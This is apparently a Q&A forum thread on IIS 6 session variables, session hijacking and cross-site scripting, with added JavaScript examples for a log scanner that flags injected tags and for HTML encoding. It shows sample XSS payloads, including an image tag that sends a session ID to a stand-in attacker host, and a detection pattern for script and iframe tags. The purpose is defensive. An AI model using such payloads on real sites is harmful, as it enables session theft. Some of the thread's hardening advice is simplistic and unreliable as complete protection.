loopstudio

Are IIS session variables secure?

Is it in general secure?

Or is it possible for a hacker to create or change the session IDs or session variables?

on IIS 6.
R_Harrison

The security issues with Session IDs (and session variables which are linked to session ids), are Session Hijacking and Cross Site Scripting.

Session Hijacking is where a hacker gives your web server the session id of somebody else - and the hacker will then be treated as the user whose id he gave. This is difficult to do, because the hacker needs to get the SessionID in the first place; however, this is where cross site scripting comes in. Using cross site scripting a hacker can obtain the sessionids, therefore providing you prevent cross site scripting, sessionids and session variables are generally secure.

You can also enhance session security by storing the IP address as a Session variable, and checking that the IP address matches on each page.  If you need code to help with this let me know.

If you do not understand cross site scripting, it is worth researching as this type of attack is becoming more and more common.
loopstudio

ASKER

ok, thanx..

So if I understand u correctly...

1) It is "in general" secure
2) But it will probably be the next popular danger-zone, so it's good to have it in mind and do some preventing
3) It's the "cross site scripting" that is the dangerous thing

Could You just write a little about what "cross site scripting" is?
a) Is it "only" if You have code from another URL inside a frame or iframe?
b) Or "only" if an attacker had the chance to upload a program to the server?
c) Or is it e.g. a danger-zone to have a java-applet installed and running? E.g. a chat-applet?
d) Or could it be as simple as having ads running on the website, with e.g. Flash animation ads from an advertising company?
I would have thought that web server software developers would put checks in place to make session hijacking more difficult like checking the ip address as you suggest but also checking other things like if the user agent suddenly changes etc.
Cross Site Scripting (XSS)...

Basically, any page you have that shows dynamic information, i.e. where you use response.write to display a variable on the web page, may be subject to XSS. Let's say you ask a user to input their name, and then on the next page you put their name at the top of the page. A hacker would enter script (usually javascript or vbscript) into the NAME box, e.g. <SCRIPT>alert("HELLO")</SCRIPT>. This script will then run on the next page... OK so far no harm done, however suppose the <SCRIPT> called a page on another server and passed the SESSIONID variable to that server - that server being run by the hacker. Now I have my SESSIONID. If I can insert this SCRIPT into your database which outputs onto a page then I could get every visitor's SESSIONID - alternatively I can "PHISH" by sending out emails with a link to YOUR website which would be something like

www.mydomain.com/apage.asp?NAME=<SCRIPT>somenastyjavascripthere</SCRIPT>

The variables are normally encoded as this makes them hard to read and thus fools more people into clicking the link, and since it goes to your website this bypasses phishing filters, etc...

Hope this helps.

daveamour:
That would be useful, however occasionally such changes are legitimate... so it would prevent us coders from really using the full power of ASP... although most of the time it would stop hackers!!!
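The phishing link shown a few lines up carries the script inside a URL-encoded query string, and the answer notes that the encoding is what hides it from the person clicking. The following is an added example (not code from this thread or from IIS) of the defender's side of that: a small scanner that URL-decodes the query field of W3C-style IIS log lines and flags any that contain the tags discussed here. The log lines are constructed for the example, and the `attacker.invalid` host is a placeholder.

```javascript
// Added example: detect tag injection attempts in web-server log entries.
// The lines are constructed to resemble W3C-format IIS fields:
// date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
const SAMPLE_LOG = [
  "2024-01-01 10:00:01 203.0.113.5 GET /apage.asp NAME=Alice 200",
  "2024-01-01 10:00:02 203.0.113.9 GET /apage.asp NAME=%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E 200",
  "2024-01-01 10:00:03 198.51.100.7 GET /apage.asp NAME=%3Cimg%20src%3D%22http%3A%2F%2Fattacker.invalid%2F%3Fs%3Dxyz%22%3E 200",
  "2024-01-01 10:00:04 203.0.113.5 GET /about.asp - 200",
  "2024-01-01 10:00:05 203.0.113.5 GET /apage.asp NAME=Bob%20%3C3 200",
];

// Tags named in the thread as carriers for injected code, plus a few common siblings.
// A bare "<" followed by text that is not a tag name (e.g. "<3") is not flagged.
const TAG_PATTERN = /<\s*\/?\s*(script|img|iframe|object|embed|svg)\b/i;

// URL-decode up to three times so a double-encoded payload is still seen;
// stop on malformed sequences instead of throwing.
function safeDecode(s) {
  let prev = null;
  let cur = s;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try {
      cur = decodeURIComponent(cur.replace(/\+/g, " "));
    } catch (e) {
      break;
    }
  }
  return cur;
}

// Split one log line into its named fields; returns null for malformed lines.
function parseLine(line) {
  const f = line.trim().split(/\s+/);
  if (f.length < 7) return null;
  return { date: f[0], time: f[1], clientIp: f[2], method: f[3], uriStem: f[4], query: f[5], status: f[6] };
}

// Return one record per line whose decoded query string contains a suspicious tag.
function findTagInjections(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec || rec.query === "-") continue;
    const decoded = safeDecode(rec.query);
    const m = TAG_PATTERN.exec(decoded);
    if (m) {
      hits.push({ clientIp: rec.clientIp, uriStem: rec.uriStem, tag: m[1].toLowerCase(), decoded });
    }
  }
  return hits;
}

// Stand-alone run: print the hits as JSON lines.
for (const hit of findTagInjections(SAMPLE_LOG)) {
  console.log(JSON.stringify(hit));
}
```

Running it over the constructed lines reports the `script` and `img` entries and leaves `NAME=Alice` and `NAME=Bob <3` alone. The decode loop matters: a scanner that matches on the raw `cs-uri-query` field would miss `%3CSCRIPT%3E` entirely, which is exactly the form the phishing link takes.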
Both of You.. it's very interesting points u have there.. Thank U... ;o)

But how can they mis-use the sessionid from a user, let's say they got that?

1) All session variables are only existing and valid while a session is active/online right?
2) And IF a hacker can get a sessionid by a <SCRIPT>alert() tag, he can only get his own right?
3) Can he get the session variables from a user?
OK, the hacker will use the <SCRIPT> to open either an IFRAME or an IMAGE, the source of either would be the hacker's ip address, and will also pass the sessionid with the source.
e.g. <IMG SRC="hackersaddress?SessionID=XXXXXXXX">

A hacker will replace the XXXXX with javascript code to add the sessionid.

Then whenever somebody visits the page which contains this extra code, the user's browser will try and load the image from the "hackersaddress" and pass the sessionid value on to the hacker.

The way IIS works (in fact most webservers) is that session variables are stored against the SessionID - the session variables are stored on your webserver (that way they are never sent over the internet and are therefore more secure) and every time the user requests a page from your server their browser passes the sessionid to your webserver. This allows your webserver to associate the session variables with that user.

A hacker will request a page from your webserver and pass the "stolen" sessionid to your server - your server then associates all the session variables and responds as though he is the genuine user. Since session variables are normally used with login processes, etc., the hacker will then be logged in and can access and use your site just like the genuine user, including changing passwords, placing orders, etc...

I hope this explains how session hijacking and XSS can be used to compromise security - it's difficult to explain but it does work and is increasing in popularity. If you need any clarification then just ask.
Hi Harrison,

Again thanx.. it's very enlightening for me. And I can see the risk.

Just to clarify the last part...

1) Doesn't he need to use the site while the real user is still online?
I mean, doesn't the session, and thereby the sessionid, get deleted when the real user logs off?
And if so, my guess would be that it doesn't matter if he tries to use the site with a stolen sessionid, because the session is not there anymore?

2) And if the real user is not online anymore - doesn't he then have to log in first?
That means he has to have already stolen the username and password?

3) And finally, by removing all "<" and ">" from fields and URLs, then it would be impossible for the hacker to "upload" a <SCRIPT>, an <IFRAME> and an <IMAGE> right?
And thereby the site would be secure against cross site scripting (XSS) ?
In response to your questions..

1. He needs to use the site while the sessionid is active - by default most webservers delete sessionids after 20 minutes of no activity (if you have a log off page normally you would wipe out all the session variables on the log off page rendering the sessionid useless - however users are notoriously bad at logging off). You should bear in mind hackers can automate the whole session hijacking process and can therefore keep the session alive by submitting requests to your webserver with the "stolen" sessionid until a time that suits them!

2. As above, however if your users can change their usernames and passwords then so could the hacker once he has hijacked the session, and your hacker will therefore have the usernames and passwords, not your genuine user.

3. Absolutely. The key to preventing XSS is to replace all "<", ">" and "(", ")" with &lt;, &gt;, etc. That way it will still display on the screen correctly, but browsers will not interpret it as code to be run. If you block XSS, session hijacking becomes very difficult and generally relies on luck and patience - however you should ensure your server is generating random sessionids - these days most servers do this by default but some older servers issue sessionids in order; this allows hackers to work out which sessionids are likely to be in use without XSS.
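The "display a variable on the page" step from the XSS explanation above, and the entity replacement recommended here, as an added example (not code from this thread, and not ASP: `renderGreeting` stands in for a classic ASP page doing Response.Write on a NAME parameter). The encoder covers the characters the answer lists, "<", ">", "(", ")", plus "&" and both quote characters, which the later question about HTMLEncode touches on; `containsForeignTag` is a rough check written for this example only.

```javascript
// Added example: reflecting user input without and with HTML entity encoding.
// The entity table follows the answer above; "&" and the quotes are included
// so the encoder is also safe for text that lands inside an attribute value.
const ENTITY_MAP = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
  "(": "&#40;", // parentheses, the extra line of defence the answer suggests
  ")": "&#41;",
};

// One pass over the string: every listed character becomes its entity, so a
// literal "&" in the input shows up on screen as "&" (encoded as &amp;).
function htmlEncode(value) {
  return String(value).replace(/[&<>"'()]/g, (ch) => ENTITY_MAP[ch]);
}

// The vulnerable form: the NAME value is written straight into the page.
function renderGreetingUnsafe(name) {
  return `<html><body><h1>Hello ${name}</h1></body></html>`;
}

// The hardened form: the value is encoded before it reaches the page.
function renderGreeting(name) {
  return `<html><body><h1>Hello ${htmlEncode(name)}</h1></body></html>`;
}

// Rough check used by this example: does the document contain any tag other
// than the ones the page itself emits?
function containsForeignTag(html) {
  const ours = /^<\/?(html|body|h1)>$/i;
  return (html.match(/<[^>]*>/g) || []).some((tag) => !ours.test(tag));
}

// Stand-alone run with the payload from the thread's explanation.
const payload = '<SCRIPT>alert("HELLO")</SCRIPT>';
console.log("unsafe :", renderGreetingUnsafe(payload));
console.log("encoded:", renderGreeting(payload));
```

With the payload from the explanation, the unencoded page contains a `<SCRIPT>` element the page never meant to emit, while the encoded page contains only text; the browser renders that text as the literal `<SCRIPT>alert("HELLO")</SCRIPT>` on screen, which is the "still displays correctly" property the answer describes. The table-driven single pass is deliberate: chaining several `replace` calls, with "&" handled last, would re-encode the entities produced by the earlier calls.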
Very informal thank U.. :)

The last thing.. Why ( & ) ?
Another thing..

IIS 6.0.. it seems like it generates session ID's that are not random!?
If you replace "<" with "&lt;" your web browser will show "<" however it will not interpret it as a command tag, thus making it safe from XSS.

IIS6 should generate random sessionid's - although this is subject to a number of things. Make sure you have all the latest updates for IIS6, Antivirus programs, AJAX, and any other program you are running that may affect the operation of IIS.
1) I wanted to know why I also should replace the "(" and the ")" ?

2) Hmm, I believe I have the newest updates, but they are not random. Is it a special update or just the normal Windows updates?
Replacing the brackets is just a back up in case somebody manages to defeat the "<" - remember, XSS code could be written in any language so it is best to be absolutely sure that XSS is prevented.

As for the random sessionid's - unfortunately I am running IIS7 now so it is hard for me to troubleshoot, however when I was on IIS6 it did generate random sessionids. As I said, check all the software is up to date on your server as some software (AJAX, etc.) can interfere with IIS.
ok, thanx.. I will reward you points :)

So tell me.. All this knowledge of Yours about this issue.. How did You get that?
Are You a former hacker, a security employee or..?
ASKER CERTIFIED SOLUTION
R_Harrison
Hi again,

Again I want to ask about the "(" and ")" - just to be 100% sure.
You are writing something about different script languages.
Is it ONLY possible IF they get past the "<" AND ">"? Or would/could You write an example with the use of "(" and ")" for me? You e.g. write that it's both possible via vbscript and javascript.

Thanx again
And if I e.g. just convert a single quote (') with HTMLencode, will it then also be secure? Or do I have to remove them?